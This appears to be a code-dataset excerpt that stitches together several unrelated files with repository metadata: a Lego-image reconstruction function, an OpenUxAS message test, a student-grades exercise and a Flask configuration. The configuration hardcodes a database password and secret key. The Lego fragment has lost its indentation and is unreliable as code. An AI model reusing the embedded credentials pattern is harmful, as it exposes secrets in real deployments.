'unsure' : unsure_cumsum
}
    # generate an image with each pixel shown as its assigned color, for
    # debugging purposes
lego_color = None
if 'lego_color' in display_list:
color_labels = np.zeros(nothing.shape, dtype=np.uint8)
color_labels[white] = 1
color_labels[green] = 2
color_labels[yellow] = 3
color_labels[red] = 4
color_labels[blue] = 5
color_labels[black] = 6
color_labels[unsure] = 7
lego_color = bm.bitmap2syn_img(color_labels)
# zc.check_and_display('lego_color', lego_color, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_scale=config.DISPLAY_SCALE,
# save_image=config.SAVE_IMAGE)
    ## the real reconstruction: map the Lego image to a brick-grid bitmap
height, width, _ = img_lego.shape
# print "Expected rows and cols: %f, %f" % (height / config.BRICK_HEIGHT,
# width / config.BRICK_WIDTH)
# calculate candidate number of rows and columns for the Lego model,
# which is purely based on the pixel numbers
n_rows_opt = max(int((height / config.BRICK_HEIGHT) + 0.5), 1)
n_cols_opt = max(int((width / config.BRICK_WIDTH) + 0.3), 1)
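    # the +0.5 / +0.3 offsets bias the rounding of the row and column counts;
    # the asymmetry is presumably an empirical tweak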
best_ratio = 0
best_bitmap = None
best_plot = None
# best_offset = None
# the real number of rows and columns may be slightly different, but we
# don't consider it now...
for n_rows in range(n_rows_opt - 0, n_rows_opt + 1):
for n_cols in range(n_cols_opt - 0, n_cols_opt + 1):
bitmap, ratio, img_plot, _ = _img2bitmap(img_lego, color_cumsums,
n_rows, n_cols, lego_color)
if bitmap is None:
continue
# print "Reconstruction confidence: %f" % ratio
if ratio > best_ratio:
best_ratio = ratio
best_bitmap = bitmap
best_plot = img_plot
if best_bitmap is None \
or best_ratio < config.BRICK_MIN_BM_RATIO \
or best_bitmap.shape != (n_rows_opt, n_cols_opt):
raise LowConfidenceError('Not confident about reconstruction, '
'maybe too much noise. '
f'Best ratio: {best_ratio}')
# zc.check_and_display('plot_line', best_plot, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_scale=config.DISPLAY_SCALE,
# save_image=config.SAVE_IMAGE)
return best_bitmap
def process(img, stretch_ratio, display_list):
objects = _find_lego(img, stretch_ratio, display_list)
img_lego, img_lego_full, img_board, img_board_ns, perspective_mtx = \
objects
objects = _correct_orientation(img_lego, img_lego_full,
display_list)
img_lego_correct, img_lego_full_correct, rotation_mtx = objects
return _reconstruct_lego(img_lego, img_board, img_board_ns,
rotation_mtx, display_list)
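# A minimal usage sketch (hypothetical; the file name, stretch_ratio value and
# display list are assumptions, not part of this module):
#
#     img = cv2.imread('test_frame.jpg')
#     bitmap = process(img, stretch_ratio=1.0,
#                      display_list=config.DISPLAY_LIST)
#     print(bitmap)  # 2D array of color indices (see config.COLOR_ORDER)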
| 45.779944
| 95
| 0.558637
|
872ebf6389b2ee1bfbe7c69fb243d2713fc20463
| 2,459
|
py
|
Python
|
tests/cpp/tests/arv/timeout_automation_response/test.py
|
VVCAS-Sean/OpenUxAS
|
dcd7be29d182d278a5387908f568d6f8a06b79ee
|
[
"NASA-1.3"
] | 88
|
2017-08-24T07:02:01.000Z
|
2022-03-18T04:34:17.000Z
|
tests/cpp/tests/arv/timeout_automation_response/test.py
|
VVCAS-Sean/OpenUxAS
|
dcd7be29d182d278a5387908f568d6f8a06b79ee
|
[
"NASA-1.3"
] | 46
|
2017-06-08T18:18:08.000Z
|
2022-03-15T18:24:43.000Z
|
tests/cpp/tests/arv/timeout_automation_response/test.py
|
VVCAS-Sean/OpenUxAS
|
dcd7be29d182d278a5387908f568d6f8a06b79ee
|
[
"NASA-1.3"
] | 53
|
2017-06-22T14:48:05.000Z
|
2022-02-15T16:59:38.000Z
|
import time
from pylmcp import Object
from pylmcp.server import Server
from pylmcp.uxas import AutomationRequestValidator, UxASConfig
# Create bridge configuration
bridge_cfg = UxASConfig()
bridge_cfg += AutomationRequestValidator()
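# Rough flow of this test (as read from the messages below): configure a UxAS
# bridge with an AutomationRequestValidator, publish vehicle configurations,
# states, keep-in/keep-out zones, an operating region and a line-search task,
# then send an AutomationRequest and expect a UniqueAutomationRequest followed
# by an (empty, timed-out) AutomationResponse.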
with Server(bridge_cfg=bridge_cfg) as server:
try:
# Send messages
for obj in (Object(class_name='AirVehicleConfiguration', ID=400,
randomize=True),
Object(class_name='AirVehicleConfiguration', ID=500,
randomize=True),
Object(class_name='AirVehicleState', ID=400,
randomize=True),
Object(class_name='AirVehicleState', ID=500,
randomize=True),
Object(class_name='KeepInZone', ZoneID=1,
randomize=True),
Object(class_name='KeepOutZone', ZoneID=2,
randomize=True),
Object(class_name='OperatingRegion', ID=3,
KeepInAreas=[1], KeepOutAreas=[2]),
Object(class_name='cmasi.LineSearchTask', TaskID=1000,
randomize=True),
Object(class_name='TaskInitialized', TaskID=1000,
randomize=True),
Object(class_name='cmasi.AutomationRequest',
TaskList=[1000], EntityList=[400, 500],
OperatingRegion=3, randomize=True)):
server.send_msg(obj)
time.sleep(0.1)
msg = server.wait_for_msg(
descriptor='uxas.messages.task.UniqueAutomationRequest',
timeout=10.0)
assert(msg.descriptor == "uxas.messages.task.UniqueAutomationRequest")
assert(msg.obj['OriginalRequest'] == obj),\
"%s\nvs\n%s" % \
(msg.obj.as_dict()['OriginalRequest'], obj.as_dict())
msg = server.wait_for_msg(descriptor="afrl.cmasi.AutomationResponse",
timeout=20.0)
assert (msg.descriptor == "afrl.cmasi.AutomationResponse")
assert (msg.obj['VehicleCommandList'] == []), \
"%s\nvs\n%s" % (msg.obj.as_dict()['VehicleCommandList'], [])
assert (msg.obj['MissionCommandList'] == []), \
"%s\nvs\n%s" % (msg.obj.as_dict()['MissionCommandList'], [])
print("OK")
finally:
print("Here")
| 44.709091
| 78
| 0.544937
|
30875767884fabae94b15daed1f341ec4cf7cbc5
| 720
|
py
|
Python
|
13 - Lists II/Ex_89.py
|
o-Ian/Practice-Python
|
1e4b2d0788e70006096a53a7cf038db3148ba4b7
|
[
"MIT"
] | 4
|
2021-04-23T18:07:58.000Z
|
2021-05-12T11:38:14.000Z
|
13 - Lists II/Ex_89.py
|
o-Ian/Practice-Python
|
1e4b2d0788e70006096a53a7cf038db3148ba4b7
|
[
"MIT"
] | null | null | null |
13 - Lists II/Ex_89.py
|
o-Ian/Practice-Python
|
1e4b2d0788e70006096a53a7cf038db3148ba4b7
|
[
"MIT"
] | null | null | null |
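# Reads (name, grade 1, grade 2) records until the user stops, prints a table
# of averages, then lets the user look up an individual student's grades by
# index (999 stops the lookup loop).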
dados = []
lista = []
n = 0
while True:
    dados.append(input('Name: '))
    dados.append(float(input('Grade 1: ')))
    dados.append(float(input('Grade 2: ')))
lista.append(dados[:])
dados.clear()
    resp = input('Continue? [Y/N]: ')
if resp in 'Nn':
break
print('=-' * 30)
print(f'{"No.":<5}{"Name":<15}{"AVERAGE":>8}')
print('-' * 30)
for n, p in enumerate(lista):
print(f'{n:<5}{p[0]:15}{(p[1] + p[2]) / 2:>8}')
print('-' * 35)
while True:
    nota_aluno = int(input('Show the grades of which student? [999 stops]: '))
if nota_aluno == 999:
break
print('-' * 35)
    print(f'The grades of \033[1m{lista[nota_aluno][0]}\033[m are {lista[nota_aluno][1::]}')
print('-' * 35)
| 24.827586
| 90
| 0.541667
|
dcd114c8553418d31eedc9ff97bb5e068c810dc9
| 907
|
py
|
Python
|
config.py
|
Bryan4real/MyBlog
|
afab82c6dd0e3cbd39b193d97912be7ef3e1bf60
|
[
"Unlicense"
] | null | null | null |
config.py
|
Bryan4real/MyBlog
|
afab82c6dd0e3cbd39b193d97912be7ef3e1bf60
|
[
"Unlicense"
] | null | null | null |
config.py
|
Bryan4real/MyBlog
|
afab82c6dd0e3cbd39b193d97912be7ef3e1bf60
|
[
"Unlicense"
] | 1
|
2020-05-11T19:32:41.000Z
|
2020-05-11T19:32:41.000Z
|
import os
class Config:
'''
Parent configuration class
'''
debug = True
SECRET_KEY = os.environ.get('SECRET_KEY')
SQLALCHEMY_DATABASE_URI = 'postgresql+psycopg2://bryan:Admin@localhost/blog'
# email configurations
MAIL_SERVER = 'smtp.gmail.com'
MAIL_PORT = 465
MAIL_USE_TLS = False
MAIL_USE_SSL = True
MAIL_USERNAME = os.environ.get("MAIL_USERNAME")
MAIL_PASSWORD = os.environ.get("MAIL_PASSWORD")
class ProdConfig(Config):
'''
Production configuration child class
'''
SQLALCHEMY_DATABASE_URI = os.environ.get("DATABASE_URL")
class DevConfig(Config):
'''
Development configuration child class
'''
SECRET_KEY = 'niMIMI'
SQLALCHEMY_DATABASE_URI = 'postgresql+psycopg2://bryan:Admin@localhost/blog'
DEBUG = True
ENV = 'development'
config_options = {
'development':DevConfig,
'production':ProdConfig,
}
| 25.914286
| 80
| 0.68688
|